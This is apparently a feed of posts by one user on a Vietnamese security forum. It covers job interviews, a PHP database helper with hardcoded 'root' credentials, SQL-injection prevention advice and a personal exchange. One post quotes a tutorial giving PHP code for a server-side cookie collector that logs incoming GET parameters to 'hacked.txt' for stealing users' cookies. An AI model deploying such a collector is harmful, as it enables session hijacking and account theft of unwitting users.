<![CDATA[Messages posted by "vina_man"]]> /hvaonline/posts/listByUser/243177.html JForum - http://www.jforum.net Cách xâm nhập vào máy tính trong mạng LAN? /hvaonline/posts/preList/43572/271030.html#271030 /hvaonline/posts/preList/43572/271030.html#271030 GMT Hướng dẫn lấy cookie(sưu tầm )

legendayhacker wrote:
Tác giả : W_Hat (Z0rr0) Tôi sẽ hướng dẫn cho các bạn một vài source code ðơn giản trước ðây tôi dùng ðể lấy cookies : Các bạn save ðoạn code sau thành file docs.php, sau ðó upload lên 1 host nào ðó support php. Mục ðích của ðoạn code này là sẽ ðọc data truyền vào khi gọi file docs.php, save thành file text với tên file là hacked.txt : Trích dẫn: //Begin of docs.php <?php define ("LINE", "\r\n"); define ("HTML_LINE", "<br>"); function getvars($arr, $title) { $res = ""; $len = count($arr); if ($len>0) { if (strlen($title)>0) { print("[--------$title--------]" . HTML_LINE); $res .= "[--------$title--------]" . LINE; } foreach ($arr as $key => $value) { print("[$key]" . HTML_LINE); print($arr[$key] . HTML_LINE); $res .= "[$ key]" . LINE . $arr[$key] . LINE; } } return $res; } // get current date $now = date("Y-m-d H : i : s "); // init $myData = "[-----$now-----]" . LINE; // get $myData .= getvars($HTTP_GET_VARS, ""); // file $file = "hacked.txt"; $mode = "r+"; if (!file_exists($file)) $mode = "w+"; $fp = fopen ($file, $mode); fseek($fp, 0, SEEK_END); fwrite($fp, $myData); fclose($fp); ?>  
Cái này cũng hay mặc dù code hơi khó nhìn chút xíu , hj cám ơn chia xẻ . :^) ]]>
/hvaonline/posts/preList/993/271028.html#271028 /hvaonline/posts/preList/993/271028.html#271028 GMT
Đi phỏng vấn. Chuẩn bị bao nhiêu kiến thức cho đủ.

quanta wrote:
Lấy dữ liệu thì OK (search connection pooling + failover), chứ sao lại có "đồng bộ hóa dữ liệu, bảo mật, quản trị" nhỉ, cái này của sysadmin chứ.  
Cám ơn anh quanta .]]>
/hvaonline/posts/preList/41128/253268.html#253268 /hvaonline/posts/preList/41128/253268.html#253268 GMT
Đi phỏng vấn. Chuẩn bị bao nhiêu kiến thức cho đủ.

danchithancong wrote:
npv: em đã từng lập trình hệ thống lớn chưa(1 hệ thống lớn có nhiều server là mail server, web server, db server....khi 1 server chết thì chương trình tự kiếm đến server để lấy dữ liệu, rồi đồng bộ hóa dữ liệu, bảo mật, quản trị....)  
Câu chia xẻ này hay đấy . Code:
public static function ExecuteQuery($sql)
	{
		$connection = mysql_connect("host","root","root") or
			die ("couldn't connect to localhost");
	
		mysql_select_db("namedb",$connection);
				
		mysql_query("set names 'utf8'");
		
		$result = mysql_query($sql,$connection);
		
		mysql_close($connection);
		
		return $result;
	}
Anh em cho hỏi mình phải code như thế nào để lấy được dữ liệu từ db server khác khi cái này die . ]]>
/hvaonline/posts/preList/41128/253264.html#253264 /hvaonline/posts/preList/41128/253264.html#253264 GMT
Giúp về thủ thuật về phòng chống SQL-ịnection /hvaonline/posts/preList/40840/252357.html#252357 /hvaonline/posts/preList/40840/252357.html#252357 GMT Giúp về thủ thuật về phòng chống SQL-ịnection

lovestormknx wrote:
Đọc 7 thủ thuật chống sql injection của bạn thì thấy bạn cần tìm hiểu thêm về sql injection, một số thủ thuật nghe nó "kỳ quái" và ngôn từ không chuẩn quá: 
Cám ơn anh đã nhận xét đúng đắng .

lovestormknx wrote:
- Dùng hàm post thay cho hàm get trong form (vậy các website nếu không muốn bị sql injection thì chuyển hết form sang phương thức post chăng? Post, Get là phương thức của form, không phải hàm) 
Em hiểu khi nào dùng Get và khi nào dùng Post ,
- Đặt biến id (biến gì?)  
Mỗi table products có ít nhất 1 PK và biến ID này là biến phụ dùng để chuyển dữ liệu list products sang detall products và đặt bằng dấu " ' ".
Mấu chống của việc chống sql injection là kiểm tra và loại bỏ dữ liệu nguy hiểm mà user có thể input vào. Muốn chống hiệu quả thì phải tìm hiểu coi người ta inject sql như thế nào. 
Em cũng có tìm hiểu sơ qua về các cách inject . Ở trên em chỉ là nêu ra vắng tắt chứ còn trình bày từng cách 1 thì rất dài dòng .Hiện tại em chỉ học năm 3 và đây la site đầu tiên em viết cho tư nhân .Nên cần nhiều ý kiến để hoàn thành tốt công việc , cũng như tìm hiểu thêm về SQL - injection Cám ơn anh đã ý kiến .]]>
/hvaonline/posts/preList/40840/251360.html#251360 /hvaonline/posts/preList/40840/251360.html#251360 GMT
Giúp về thủ thuật về phòng chống SQL-ịnection /hvaonline/posts/preList/40840/251309.html#251309 /hvaonline/posts/preList/40840/251309.html#251309 GMT tìm hiểu về cookie . /hvaonline/posts/preList/40642/250241.html#250241 /hvaonline/posts/preList/40642/250241.html#250241 GMT Hỏi về phỏng vấn xin việc . /hvaonline/posts/preList/40261/248819.html#248819 /hvaonline/posts/preList/40261/248819.html#248819 GMT Hỏi về phỏng vấn xin việc . /hvaonline/posts/preList/40261/248239.html#248239 /hvaonline/posts/preList/40261/248239.html#248239 GMT học PHP ở Cisnet hay Nhất Nghệ /hvaonline/posts/preList/22904/244984.html#244984 /hvaonline/posts/preList/22904/244984.html#244984 GMT Máy tính có các kết nối lạ và dòng data lạ /hvaonline/posts/preList/39715/244711.html#244711 /hvaonline/posts/preList/39715/244711.html#244711 GMT Gửi anh conmale và các đàn anh...

conmale wrote:
Không có con đường nào đúng đắn cho mọi người cả. Mỗi đời người là một cuốn sách, mỗi ngày là một trang trong cuốn sách đó. Con đường thế nào là do tinh thần, tư duy, cá tính và môi trường của từng người. Những con người bình thường hay chọn đường mòn mà đi, những con người không bình thường hay chọn những con đường mới, phá đá, phá rừng mà đi. 
Tại sao lại không có con đường đúng đắn ? như vậy chẳng lẽ mọi con đuòng đều sai ? làm sao biết mình là người bình thường ? người không bình thường ? xin sư huynh chỉ giáo .]]>
/hvaonline/posts/preList/1369/243125.html#243125 /hvaonline/posts/preList/1369/243125.html#243125 GMT